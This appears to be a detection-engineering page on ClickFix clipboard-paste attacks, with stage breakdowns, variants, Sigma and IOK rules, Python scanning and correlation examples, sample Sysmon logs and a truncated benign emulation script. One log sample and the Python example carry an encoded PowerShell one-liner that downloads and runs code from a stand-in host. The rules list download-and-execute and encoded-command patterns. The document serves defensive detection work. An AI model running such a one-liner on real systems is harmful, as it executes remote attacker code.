ClickFix Techniques
Social engineering attacks that trick users into copying and executing malicious commands via clipboard manipulation. A malicious site instructs the user to copy a command (often disguised as a CAPTCHA fix, software update, or troubleshooting step) and paste it into a Run dialog, terminal, or browser address bar. The clipboard is the pivot — the scripting interpreter execution is the chokepoint. Between late 2024 and early 2025, nation-state actors including APT28 (Russia), MuddyWater (Iran), and Kimsuky (North Korea) adopted ClickFix in targeted espionage campaigns, elevating it from commodity crimeware to an advanced persistent threat vector.
Prerequisites (Environmental)
- Scripting interpreter available on target system (powershell.exe, cmd.exe, mshta.exe, bash)
- Modern browser with Clipboard API enabled (default on all mainstream browsers)
Attack Chokepoints (3 invariant stages)
Each stage is an invariant condition the attacker must satisfy — regardless of tool, variant, or threat actor. Detection at any stage breaks the chain.
Lure/Delivery (Research tier: Baseline)
Browser renders a page combining a Clipboard API write with an explicit execution instruction, and writes malicious command content to the Windows clipboard via navigator.clipboard.writeText or ClipboardItem.
Invariant: co-occurrence of clipboard seeding and an execution hint is the fingerprint across all variants; no visual redesign removes both elements simultaneously, and the user cannot execute content that was never placed on the clipboard.
Data sources:
- Web proxy with JS/HTML content inspection
- IOK lure-page rule feed (phish.report)
- ETW Microsoft-Windows-Win32k (GUID: 8c416c79-d49b-4f01-a467-e56d3aa8234c)
- ETW Microsoft.Windows.OLE.Clipboard (GUID: 3e0e3a92-b00b-4456-9dee-f40aba77f00e)

Execution (Hunt tier: Active Hunt)
User pastes clipboard content into a scripting interpreter (powershell.exe, cmd.exe, mshta.exe, wt.exe) spawned from a browser, Explorer, or terminal parent.
Invariant: the paste-and-execute action is the entire attack primitive; no variant skips the parent-process relationship between the delivery surface and the interpreter.
Data sources:
- Sysmon Event ID 1 (Process Creation)
- Windows Security Event ID 4688 (Process Creation)

Second Stage Retrieval (Analyst tier: SOC Alert)
Spawned interpreter makes an outbound connection to attacker infrastructure within seconds of execution to download the next stage or beacon home.
Invariant: all payloads must retrieve a next stage or establish C2; none is fully self-contained without network contact.
Data sources:
- Sysmon Event ID 3 (Network Connection)
- Sysmon Event ID 22 (DNS Query)
Variations
Tools and methods that exploit this chokepoint — the list grows; the chokepoint doesn't change:
- ClickFix (original): fake CAPTCHA or browser-fix prompts the user to paste PowerShell into the Run dialog
- FileFix: shifts the attack surface to the Windows File Explorer address bar; weaponized within two weeks of public disclosure
- TerminalFix: mimics terminal windows; targets IT-savvy users with the same execution path
- DownloadFix: simplified delivery; the user pastes a download-and-execute one-liner
- Family of variants using clipboard-paste-execute with different social engineering pretexts
- WebDAV ClickFix: victims paste UNC paths into the Run dialog; mshta.exe executes JScript from an attacker WebDAV share
- InstallFix: clones AI/developer tool install pages; distributed via Google Ads malvertising
- Windows Terminal ClickFix: lure uses the Win+X→I shortcut; hex/XOR-encoded PowerShell in wt.exe bypasses Run-dialog detections
- DNS-based ClickFix (KongTuke): payload embedded in a DNS Name field response; nslookup retrieval evades URL-based web filtering
Detection Strategy
Build detections iteratively. Start broad to understand your baseline, then tighten to production-ready.
title: Scripting Interpreter Outbound Network Connection
id: c4f8a2b1-3e7d-4a5c-8b9f-2d1e6f0a7c3b
status: experimental
description: >
    Detects scripting interpreters (powershell.exe, cmd.exe, wscript.exe, etc.) making
    outbound connections to external (non-RFC1918) addresses. Broad research-level rule
    for the ClickFix chokepoint. Establishes baseline visibility into scripting interpreter
    network behavior. High false positive rate expected — use for research and baselining only.
references:
    - https://huntress.com/blog/dont-sweat-clickfix-techniques
    - https://mhaggis.github.io/ClickGrab/
    - https://attack.mitre.org/techniques/T1204/001/
author: "@iimp0ster"
date: 2025/01/15
tags:
    - attack.initial_access
    - attack.t1204.001
    - attack.t1204.003
    - detection.maturity.research
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\mshta.exe'
    filter_private_ranges:
        DestinationIp|startswith:
            - '10.'
            - '172.16.'
            - '172.17.'
            - '172.18.'
            - '172.19.'
            - '172.20.'
            - '172.21.'
            - '172.22.'
            - '172.23.'
            - '172.24.'
            - '172.25.'
            - '172.26.'
            - '172.27.'
            - '172.28.'
            - '172.29.'
            - '172.30.'
            - '172.31.'
            - '192.168.'
            - '127.'
            - '::1'
            - 'fe80:'
    filter_loopback:
        DestinationIp: '0.0.0.0'
    condition: selection and not 1 of filter_*
falsepositives:
    - Legitimate administrative scripts making web requests (SCCM, Ansible, etc.)
    - Software update mechanisms (Windows Update, application updaters)
    - Monitoring agents and IT management tooling
    - Developer tooling (npm, pip, curl wrappers, build scripts)
    - Security scanning tools
level: low

title: Browser or Explorer Spawning Script Interpreter
id: a7b3c9d2-5e8f-4a1b-9c6d-3f2e8b0a4d7e
status: experimental
description: >
    Detects scripting interpreters (PowerShell, cmd, wscript, mshta) spawned directly by
    web browsers, Windows Explorer, or Windows Terminal. This is a hunt-level rule
    targeting the ClickFix chokepoint, where users are socially engineered to paste and
    execute malicious commands. The Windows Terminal path (wt.exe parent) covers the
    March 2026 variant disclosed by Microsoft Defender Experts (Lumma Stealer delivery
    via Win+X→I terminal lure). Browsers and Explorer should rarely directly spawn
    scripting interpreters in normal enterprise operations.
references:
    - https://huntress.com/blog/dont-sweat-clickfix-techniques
    - https://staging.huntress.com/blog/dont-sweat-clickfix-techniques
    - https://mhaggis.github.io/ClickGrab/
    - https://www.aitmfeed.com/blog/blog-1/tracking-clickfix-infrastructure-4
    - https://attack.mitre.org/techniques/T1204/001/
    - https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
    - https://www.bleepingcomputer.com/news/security/new-clickfix-attack-abuses-nslookup-to-retrieve-powershell-payload-via-dns/
author: "@iimp0ster"
date: 2025/01/15
tags:
    - attack.initial_access
    - attack.t1204.001
    - attack.t1204.003
    - detection.maturity.hunt
logsource:
    category: process_creation
    product: windows
detection:
    selection_interpreter:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\mshta.exe'
    selection_parent_browser:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
            - '\iexplore.exe'
            - '\opera.exe'
            - '\brave.exe'
            - '\vivaldi.exe'
            - '\waterfox.exe'
    selection_parent_explorer:
        ParentImage|endswith:
            - '\explorer.exe'
            - '\wt.exe'
            - '\WindowsTerminal.exe'
    filter_known_legit:
        # Browser-launched shell integrations for file associations (rare but legitimate)
        CommandLine|contains:
            - 'IEShims.dll'
            - 'ShellExecute'
    condition: selection_interpreter and (selection_parent_browser or selection_parent_explorer) and not filter_known_legit
falsepositives:
    - Browser extensions that invoke system shell for file processing (rare)
    - Shell integrations for file associations opened via browser download
    - IT tooling launched from Windows Explorer (e.g., admin scripts opened by double-click)
    - Some enterprise software launchers that spawn from explorer.exe
level: medium

title: Browser-Spawned Script with Encoded Command — ClickFix/Clipboard Attack
id: f1e2d3c4-b5a6-4789-a0b1-c2d3e4f5a6b7
status: experimental
description: >
    High-fidelity detection for ClickFix and similar clipboard-based social engineering
    attacks. Detects scripting interpreters with encoded or obfuscated command lines
    spawned by browsers or Windows Explorer. This pattern is strongly indicative of a
    user pasting and executing a malicious command copied from a threat actor-controlled
    webpage. Minimal false positives expected in most enterprise environments.
references:
    - https://huntress.com/blog/dont-sweat-clickfix-techniques
    - https://staging.huntress.com/blog/dont-sweat-clickfix-techniques
    - https://mhaggis.github.io/ClickGrab/
    - https://www.aitmfeed.com/blog/blog-1/tracking-clickfix-infrastructure-4
    - https://attack.mitre.org/techniques/T1204/001/
    - https://attack.mitre.org/techniques/T1204/003/
author: "@iimp0ster"
date: 2025/01/15
tags:
    - attack.initial_access
    - attack.t1204.001
    - attack.t1204.003
    - attack.defense_evasion
    - attack.t1027
    - detection.maturity.analyst
logsource:
    category: process_creation
    product: windows
detection:
    selection_interpreter:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
            - '\wscript.exe'
            - '\mshta.exe'
    selection_parent:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
            - '\iexplore.exe'
            - '\opera.exe'
            - '\brave.exe'
            - '\vivaldi.exe'
            - '\explorer.exe'
    selection_encoded:
        CommandLine|contains:
            # PowerShell encoded command flags
            - ' -enc '
            - ' -EncodedCommand '
            - ' -ec '
            # Base64 decode patterns
            - 'FromBase64String'
            - 'Convert]::FromBase64'
            # Execution patterns
            - 'IEX ('
            - 'IEX('
            - 'Invoke-Expression'
            - 'iex('
            # Download-and-execute patterns
            - 'DownloadString'
            - 'DownloadFile'
            - 'WebClient'
            - 'Net.WebClient'
            - 'Invoke-WebRequest'
            - 'iwr '
            - 'curl '
            # mshta http invocation
            - 'mshta http'
            - 'mshta vbscript'
            # cmd piping to powershell
            - '/c powershell'
            - '/c start'
    filter_legit_software:
        # Known-good software that uses encoded commands during legitimate operation
        # Tune this list for your environment
        ParentCommandLine|contains:
            - 'Teams.exe'
            - 'OneDrive.exe'
    condition: selection_interpreter and selection_parent and selection_encoded and not filter_legit_software
falsepositives:
    - Legitimate software deployment tools that encode commands (rare when browser is parent)
    - Custom IT automation scripts that use encoded commands and are user-initiated
    - Developers using PowerShell with encoding from browser-launched terminals
level: high
Early Detection Layers
Detect before the user pastes or executes — earlier in the kill chain than the Sysmon-based rules above, using different data sources.
title: Browser Process Writing Scripting Payload to Clipboard (ETW)
id: f3b8e2d1-7c4a-4b9e-a2f6-1d8e5c0b3a7f
status: experimental
description: >
    Detects browser processes writing PowerShell or command-interpreter keywords to the
    Windows clipboard via ETW (Microsoft-Windows-Win32k SetClipboardData events). This is
    the ClickFix chokepoint at the pre-execution layer — the clipboard write fires before
    the user pastes and executes the payload. Covers all ClickFix variants (ClickFix,
    FileFix, WebDAV ClickFix, Windows Terminal ClickFix, InstallFix, DNS-based ClickFix)
    because clipboard seeding is an inescapable prerequisite for the attack regardless of
    which paste target the lure page instructs the user to use.
references:
    - https://gist.github.com/mattifestation/04e8299d8bc97ef825affe733310f7bd
    - https://github.com/mandiant/SilkETW
    - https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
    - https://attack.mitre.org/techniques/T1204/004/
author: "@iimp0ster"
date: 2026/03/10
tags:
    - attack.initial_access
    - attack.t1204.004
    - detection.maturity.hunt
    - detection.datasource.etw
logsource:
    product: windows
    category: clipboard
    # Requires ETW infrastructure. Two provider options:
    #   Microsoft-Windows-Win32k         GUID: 8c416c79-d49b-4f01-a467-e56d3aa8234c
    #   Microsoft.Windows.OLE.Clipboard  GUID: 3e0e3a92-b00b-4456-9dee-f40aba77f00e
    # Configure SilkETW (github.com/mandiant/SilkETW) with either provider and route
    # output to Windows Event Log or forward to SIEM via Windows Event Forwarding (WEF).
    # Field names below reflect SilkETW JSON serialization defaults — adjust to match
    # your ingestion pipeline's schema.
detection:
    selection_browser:
        ProcessName|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
            - '\iexplore.exe'
            - '\brave.exe'
            - '\opera.exe'
            - '\vivaldi.exe'
            - '\waterfox.exe'
    selection_payload_keywords:
        ClipboardContent|contains:
            - 'powershell'
            - '-EncodedCommand'
            - '-enc '
            - 'mshta'
            - 'nslookup'
            - 'cmd.exe'
            - 'wscript'
            - 'cscript'
            - 'IEX'
            - 'Invoke-Expression'
            - '\\\\'   # UNC path prefix — WebDAV ClickFix variant
    condition: selection_browser and selection_payload_keywords
falsepositives:
    - Developer tools or documentation sites that copy script examples to clipboard (rare
      match against these specific keywords in combination with a browser process)
    - Code snippet managers or password managers with keyboard shortcut triggers
level: high

title: ClickFix Lure Page — Clipboard API Write with Execution Instruction
description: >
    Detects ClickFix-family lure pages that combine a JavaScript Clipboard API write
    (navigator.clipboard.writeText / ClipboardItem) with instructions directing the user
    to paste into a Run dialog, Windows Terminal, File Explorer address bar, or similar
    execution context. The co-occurrence of clipboard seeding AND an execution instruction
    is the stable invariant across all ClickFix variants regardless of visual design,
    threat actor, or obfuscation technique. Covers: ClickFix (original), FileFix, WebDAV
    ClickFix, Windows Terminal ClickFix, InstallFix, DNS-based ClickFix, and future variants
    that have not yet been named.
tags:
    - clickfix
    - initial_access
    - t1204.004
references:
    - https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
    - https://mrd0x.com/filefix-clickfix-alternative/
    - https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
    - https://attack.mitre.org/techniques/T1204/004/
    - https://phish.report/docs/iok-rule-reference
detection:
    clipboard_api:
        js|contains:
            - 'navigator.clipboard.writeText'
            - 'navigator.clipboard.write'
            - 'ClipboardItem'
    execution_hint:
        html|contains:
            - 'Win+R'
            - 'Windows key'
            - 'Run dialog'
            - 'Ctrl+V'
            - 'Windows Terminal'
            - 'Win+X'
            - 'address bar'
            - 'Ctrl+L'
    condition: clipboard_api and execution_hint

# ─── IOK Detection Notes ─────────────────────────────────────────────────────────
# Kill chain position: PRE-INTERACTION — fires against the lure page itself, before
# the user copies or executes anything. Earliest possible detection point.
#
# Why this condition is stable across all variants:
#   clipboard_api  — the browser MUST write the payload to the clipboard; without this
#                    the user cannot paste it. Cannot be removed without breaking the attack.
#   execution_hint — the page MUST instruct the user where to paste; without this the
#                    user will not execute the payload. Cannot be removed without breaking
#                    the social engineering component.
#
# False positive profile:
#   clipboard_api alone                → HIGH FP (widely used by legitimate sites for copy buttons)
#   execution_hint alone               → LOW FP (paste-into-shell instructions are unusual on legit sites)
#   clipboard_api AND execution_hint   → VERY LOW FP (near-unique to ClickFix)
#
# Evasion considerations:
#   - Obfuscated clipboard writes (e.g., atob() + eval(), string concatenation) evade
#     js|contains; add dom|contains matchers if your scanner supports post-JS rendering.
#   - Multilingual lures: add translated execution instructions for your threat landscape
#     (e.g., Japanese: 'を押して', Korean: '실행', etc.)
#   - Dynamically injected clipboard write (loaded from external JS) evades js|contains;
#     pair with requests|contains for known ClickFix JS CDN patterns.
#
# Usage:
#   - Submit to phish.report/IOK for community feed inclusion.
#   - Run against URLScan.io live scan API for proactive infrastructure hunting.
#   - Integrate with web proxy content inspection for real-time blocking.
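The IOK rule's co-occurrence condition and its false-positive profile can be exercised offline. The following is an added example (not the IOK rule itself, and not phish.report's or the project's tooling): a small Python scanner that applies the same clipboard_api AND execution_hint logic to page HTML, run over four constructed pages that cover the rule's three verdict cells plus one page whose clipboard call is assembled by string concatenation, the evasion the notes above warn about. Assumptions: matching is case-insensitive, and inline <script> bodies stand in for IOK's js matcher (a real scanner would also fetch external scripts); the sample pages, the placeholder "command" string and the verdict names are constructed for the example.

```python
"""Scan page HTML for the ClickFix lure invariant: a Clipboard API write AND an instruction telling
the user where to paste. Added example; not the IOK rule itself or phish.report tooling."""
import re

# Matchers copied from the IOK rule above, plus the multilingual hints its evasion notes suggest.
# Lower-cased: this scanner matches case-insensitively (an assumption, as in Sigma).
CLIPBOARD_API = ('navigator.clipboard.writetext', 'navigator.clipboard.write', 'clipboarditem')
EXECUTION_HINTS = ('win+r', 'windows key', 'run dialog', 'ctrl+v', 'windows terminal',
                   'win+x', 'address bar', 'ctrl+l', 'を押して', '실행')
SCRIPT_RE = re.compile(r'<script\b[^>]*>(.*?)</script>', re.IGNORECASE | re.DOTALL)


def inline_js(html):
    """Bodies of inline <script> blocks: a stand-in for IOK's js matcher. A real scanner would
    also fetch external scripts, which is the gap the rule's evasion notes describe."""
    return '\n'.join(SCRIPT_RE.findall(html)).lower()


def scan_page(html):
    """Return the verdict and the matched indicators, following the rule's false-positive profile."""
    js, page = inline_js(html), html.lower()
    clipboard = [m for m in CLIPBOARD_API if m in js]
    hints = [h for h in EXECUTION_HINTS if h in page]
    if clipboard and hints:
        verdict = 'clickfix-lure'    # both invariants present: near-unique to ClickFix
    elif clipboard:
        verdict = 'clipboard-only'   # legitimate copy buttons land here (high FP on its own)
    elif hints:
        verdict = 'hint-only'        # help pages, or a clipboard write the js matcher cannot see
    else:
        verdict = 'clean'
    return {'verdict': verdict, 'clipboard_api': clipboard, 'execution_hint': hints}


# Constructed sample pages (not captured from real infrastructure). The copied "command" in the
# lure samples is a placeholder string, not a working payload.
LURE_PAGE = """<html><title>Verify you are human</title><body>
<button id="cb">I am not a robot</button>
<p>To complete verification: press Win+R, then Ctrl+V, then Enter.</p>
<script>
document.getElementById('cb').onclick = () =>
  navigator.clipboard.writeText('PLACEHOLDER-COMMAND-FOR-DEMO');
</script></body></html>"""

DOCS_PAGE = """<html><title>CLI reference</title><body>
<pre id="snip">tool --version</pre><button id="copy">Copy</button>
<script>copy.onclick = () => navigator.clipboard.writeText(snip.textContent);</script>
</body></html>"""

HELP_PAGE = """<html><title>Check your Windows build</title><body>
<p>Press Win+R, type winver and press Enter to see the build number.</p>
</body></html>"""

# Clipboard call assembled by string concatenation: the evasion the rule's notes warn about.
OBFUSCATED_PAGE = """<html><title>Verify you are human</title><body>
<p>Press Win+R, then Ctrl+V, then Enter.</p>
<script>navigator['clip' + 'board'].writeText('PLACEHOLDER-COMMAND-FOR-DEMO');</script>
</body></html>"""

if __name__ == '__main__':
    for name, page in (('lure', LURE_PAGE), ('docs', DOCS_PAGE),
                       ('help', HELP_PAGE), ('obfuscated', OBFUSCATED_PAGE)):
        print(f'{name:11}', scan_page(page))
```

The obfuscated page comes back as hint-only rather than clickfix-lure, which is exactly the blind spot the notes describe: the execution hint is still visible in the HTML, but the clipboard write is not visible to a text matcher until the script has run, so a dom matcher on the rendered page is what closes that gap.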
Evolution Timeline (9 events)
Techniques and tooling evolve; the underlying detection chokepoint does not.
InstallFix — Developer-Targeted ClickFix via Malvertising
Change: Lure evolves from fake CAPTCHA to cloned developer tool install documentation distributed via Google Ads malvertising; execution chokepoint unchanged.
Detection impact: No change to the execution chokepoint; mshta.exe → conhost.exe → infostealer is caught by existing Research and Hunt rules; developer endpoints require the same coverage as general enterprise endpoints
KongTuke DNS-Staging via nslookup (Microsoft disclosure, February 2026)
Change: Payload staging channel shifts from HTTP to DNS Name field response; nslookup queries attacker-controlled DNS server, evading URL-based web filtering entirely.
Detection impact: Add nslookup.exe spawned by cmd.exe with a hardcoded external IP as a hunt indicator (Sysmon EID 1); monitor for DNS responses with anomalously large Name fields; existing browser-parent scripting interpreter rules do not catch this path since execution originates from the Run dialog, not a browser
Windows Terminal ClickFix (Microsoft Defender Experts disclosure, March 6, 2026)
Change: Paste target shifts to Windows Terminal (wt.exe) with hex/XOR-encoded payload; MSBuild.exe used as LOLBin; existing browser-parent rules miss this path entirely.
Detection impact: Existing browser-parent and explorer-parent detection rules miss this path entirely; wt.exe / WindowsTerminal.exe must be added as parent process in Hunt and Analyst rules; PowerShell Script Block Logging required to surface hex/XOR-encoded commands; MSBuild.exe spawned outside build context is an additional high-fidelity pivot
FileFix published and weaponized within two weeks
Change: Attack surface expands from Run dialog to File Explorer address bar; same clipboard delivery, new parent-process path to monitor.
Detection impact: Monitor for suspicious processes spawned from explorer.exe with File Explorer address bar as vector; existing browser-parent rules may not catch this path
WebDAV ClickFix Variant
Change: Payload delivery migrates from HTTP to WebDAV UNC paths; mshta.exe executes JScript directly from attacker share in a fileless chain injecting .NET assembly into explorer.exe.
Detection impact: mshta.exe already in detection scope; UNC path patterns (\\\\) in CommandLine are a higher-confidence indicator; fileless .NET injection via VirtualAllocEx/WriteProcessMemory/CreateRemoteThread requires memory-based detection for later stages
Nation-state adoption begins
Change: APT28, MuddyWater (TA450), Kimsuky (TA427), and UNK_RemoteRogue adopt ClickFix; payloads shift from commodity stealers to RATs and APT implants.
Detection impact: Payloads shift from commodity stealers (Lumma) to RATs (QuasarRAT) and APT implants; lure quality increases significantly; detection logic unchanged but triage priority rises
DownloadFix Variant
Change: Simplified payload with direct download-execute one-liner; less obfuscation required.
Detection impact: Same clipboard interaction and execution pattern
TerminalFix Variant
Change: UI mimics terminal windows targeting IT-savvy users; payload and execution path unchanged.
Detection impact: No change — still scripting interpreter execution
ClickFix Original
Change: First documented by Proofpoint via TA571; no malicious attachment required — user clipboard is the entire delivery mechanism.
Detection impact: New pattern requiring detection development
Raw Log Samples (3 samples)
Real-world log events produced by this technique and which Sigma rules they trigger.
EventID: 1 (Process Create)
UtcTime: 2024-11-03 14:52:17.442
ProcessGuid: {b2c3d4e5-2345-6789-bcde-f01234567890}
ProcessId: 7124
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -NonInteractive -NoProfile -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjADIALQBkAG8AbQBhAGkAbgAvAHAAYQB5AGwAbwBhAGQAJwApAA==
CurrentDirectory: C:\Users\jsmith\
ParentProcessId: 6892
ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe
ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer
# Key signal: ParentImage=chrome.exe + CommandLine contains -EncodedCommand
# User copied "fix" command from malicious page, pasted into Run dialog

EventID: 22 (DNS query)
UtcTime: 2024-11-03 14:52:18.031
ProcessGuid: {b2c3d4e5-2345-6789-bcde-f01234567890}
ProcessId: 7124
QueryName: update-cdn77.net
QueryStatus: 0
QueryResults: type: 5 cdn-update-service.net;::ffff:185.220.101.47;
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
# Non-browser process making DNS query for a newly registered domain

EventID: 3 (NetworkConnect)
UtcTime: 2024-11-03 14:52:18.247
ProcessGuid: {b2c3d4e5-2345-6789-bcde-f01234567890}
ProcessId: 7124
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: CORP\jsmith
Protocol: tcp
Initiated: true
SourceIp: 10.10.1.87
SourcePort: 54221
DestinationIp: 185.220.101.47
DestinationHostname: update-cdn77.net
DestinationPort: 443
# powershell.exe connecting to non-RFC1918 IP within seconds of parent=chrome.exe launch
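The three chokepoints, the Research/Hunt/Analyst rules in the Detection Strategy section, and the samples above can be tied together in one small evaluator. The following is an added example (not the project's code): Python that applies each tier's logic to Sysmon-style events, correlates the EID 1 spawn with the EID 3 outbound connection from the same process inside a time window, and decodes the -EncodedCommand argument so an analyst can see the plaintext during triage. The events are constructed, modelled on the samples above, with the page's own encoded-command value for the malicious process and a benign SCCM-launched script as the negative case. Assumptions: the 60-second window, keying findings on ProcessId, an ipaddress-based external-address check in place of the rule's DestinationIp|startswith list, and wt.exe/WindowsTerminal.exe added as parents as the timeline recommends.

```python
"""Apply the Research, Hunt and Analyst tiers from the Sigma rules above to Sysmon-style events
and correlate EID 1 (spawn) with EID 3 (outbound) per process. Added example, not the project's code."""
import base64
import ipaddress
import re
from datetime import datetime, timedelta

# Match lists from the Sigma rules, lower-cased (Sigma matching is case-insensitive); wt.exe and
# WindowsTerminal.exe are included as parents, as the Windows Terminal timeline entry recommends.
INTERPRETERS = ('\\powershell.exe', '\\pwsh.exe', '\\cmd.exe', '\\wscript.exe', '\\cscript.exe', '\\mshta.exe')
SUSPICIOUS_PARENTS = ('\\chrome.exe', '\\firefox.exe', '\\msedge.exe', '\\iexplore.exe', '\\opera.exe',
                      '\\brave.exe', '\\vivaldi.exe', '\\waterfox.exe', '\\explorer.exe', '\\wt.exe',
                      '\\windowsterminal.exe')
ENCODED_MARKERS = (' -enc ', ' -encodedcommand ', ' -ec ', 'frombase64string', 'invoke-expression', 'iex (',
                   'iex(', 'downloadstring', 'downloadfile', 'net.webclient', 'invoke-webrequest', 'iwr ',
                   'mshta http', '/c powershell')
ENC_FLAG = re.compile(r'-(?:encodedcommand|enc|ec)\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)

# ENCODED_SAMPLE is the -EncodedCommand value from the page's EID 1 sample; everything else here is
# constructed telemetry, not real events. PID 8001 is a benign SCCM-launched script: no tier should fire.
ENCODED_SAMPLE = 'aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjADIALQBkAG8AbQBhAGkAbgAvAHAAYQB5AGwAbwBhAGQAJwApAA=='
PS_EXE = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
SAMPLE_EVENTS = [
    {'EventID': 1, 'UtcTime': '2024-11-03 14:52:17.442', 'ProcessId': 7124, 'Image': PS_EXE,
     'CommandLine': 'powershell.exe -NonInteractive -NoProfile -EncodedCommand ' + ENCODED_SAMPLE,
     'ParentImage': r'C:\Program Files\Google\Chrome\Application\chrome.exe'},
    {'EventID': 3, 'UtcTime': '2024-11-03 14:52:18.247', 'ProcessId': 7124, 'Image': PS_EXE,
     'Initiated': 'true', 'DestinationIp': '185.220.101.47', 'DestinationPort': 443},
    {'EventID': 1, 'UtcTime': '2024-11-03 15:01:02.000', 'ProcessId': 8001, 'Image': PS_EXE,
     'CommandLine': r'powershell.exe -NoProfile -File C:\scripts\inventory.ps1',
     'ParentImage': r'C:\Windows\CCM\CcmExec.exe'},
    {'EventID': 3, 'UtcTime': '2024-11-03 15:01:02.500', 'ProcessId': 8001, 'Image': PS_EXE,
     'Initiated': 'true', 'DestinationIp': '10.10.1.5', 'DestinationPort': 443},
]


def is_external(ip):
    """Research-tier filter: true unless private, loopback, link-local or unspecified. Using
    ipaddress instead of a startswith list also unwraps IPv4-mapped IPv6 addresses (::ffff:a.b.c.d)."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_unspecified)


def research_match(ev):
    """Research tier: an interpreter initiating a connection to an external address (EID 3)."""
    return (str(ev.get('Initiated', '')).lower() == 'true'
            and ev.get('Image', '').lower().endswith(INTERPRETERS)
            and is_external(ev.get('DestinationIp', '0.0.0.0')))


def hunt_match(ev):
    """Hunt tier: an interpreter spawned by a browser, Explorer or Windows Terminal (EID 1)."""
    return (ev.get('Image', '').lower().endswith(INTERPRETERS)
            and ev.get('ParentImage', '').lower().endswith(SUSPICIOUS_PARENTS))


def analyst_match(ev):
    """Analyst tier: a Hunt match whose command line is encoded, obfuscated or download-and-execute."""
    cmd = ev.get('CommandLine', '').lower()
    return hunt_match(ev) and any(m in cmd for m in ENCODED_MARKERS)


def decode_encoded_command(cmdline):
    """Recover the plaintext of a -EncodedCommand argument (base64 of UTF-16LE) for triage."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def _ts(value):
    return datetime.strptime(value, '%Y-%m-%d %H:%M:%S.%f')


def correlate(events=SAMPLE_EVENTS, window_seconds=60):
    """One finding per ProcessId: tiers fired, whether spawn -> outbound completed inside the
    window, and the decoded payload. Production code should key on ProcessGuid (PIDs are reused)."""
    findings = {}
    for ev in events:
        f = findings.setdefault(ev['ProcessId'], {'research': False, 'hunt': False, 'analyst': False,
                                                  'chain': False, 'spawned': None, 'decoded': None})
        if ev['EventID'] == 1 and hunt_match(ev):
            f['hunt'], f['spawned'] = True, _ts(ev['UtcTime'])
            if analyst_match(ev):
                f['analyst'], f['decoded'] = True, decode_encoded_command(ev['CommandLine'])
        elif ev['EventID'] == 3 and research_match(ev):
            f['research'] = True
            if f['spawned'] and _ts(ev['UtcTime']) - f['spawned'] <= timedelta(seconds=window_seconds):
                f['chain'] = True
    return findings


if __name__ == '__main__':
    for pid, f in correlate().items():
        fired = [t for t in ('research', 'hunt', 'analyst') if f[t]]
        print(f"PID {pid}: tiers={fired} chain={f['chain']} decoded={f['decoded']!r}")
```

For PID 7124 all three tiers fire and the chain closes within a second, and the decoded command shows the download-and-execute one-liner behind the base64; the SCCM-launched script fires nothing because its parent is not in the suspicious list and its destination is private. In production the ProcessGuid, not the PID, is the right correlation key, and the decoded text belongs in the alert so the analyst does not have to decode it by hand.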
Emulation Script
#Requires -Version 5.1
# MITRE ATT&CK: T1204.004 — Malicious Copy-Paste
# Simulates ClickFix UI deception chain that spawns a script interpreter to execute a payload.
[CmdletBinding()]
param(
    [switch]$UseVbsShim,
    [switch]$CleanupOnly
)

Set-StrictMode -Version Latest
$ErrorActionPreference = 'Stop'

$VbsShimPath = Join-Path $env:TEMP "cf_shim_$(Get-Random).vbs"
$C2Endpoint  = 'https://example.com'

function Write-Step ([string]$Msg) { Write-Host "[*] $Msg" -ForegroundColor Cyan }
function Write-Ok   ([string]$Msg) { Write-Host "[+] $Msg" -ForegroundColor Green }
function Write-Warn ([string]$Msg) { Write-Host "[!] $Msg" -ForegroundColor Yellow }

function Remove-Artefacts {
    if (Test-Path $VbsShimPath) {
        Remove-Item $VbsShimPath -Force -ErrorAction SilentlyContinue
        Write-Ok "Removed VBS shim: $VbsShimPath"
    }
}

if ($CleanupOnly) { Remove-Artefacts; exit 0 }

Write-Host ""
Write-Host "=== ClickFix Technique Emulation ===" -ForegroundColor Magenta
Write-Host "    T1204.004 | Detection Chokepoints Project" -ForegroundColor DarkGray
Write-Host ""

Write-Step "Step 1/3 — Executing PowerShell with -EncodedCommand flag"
# Benign payload: Get-Date | Out-String (base64 encoded)
$BenignCmd  = 'Get-Date | Out-String'
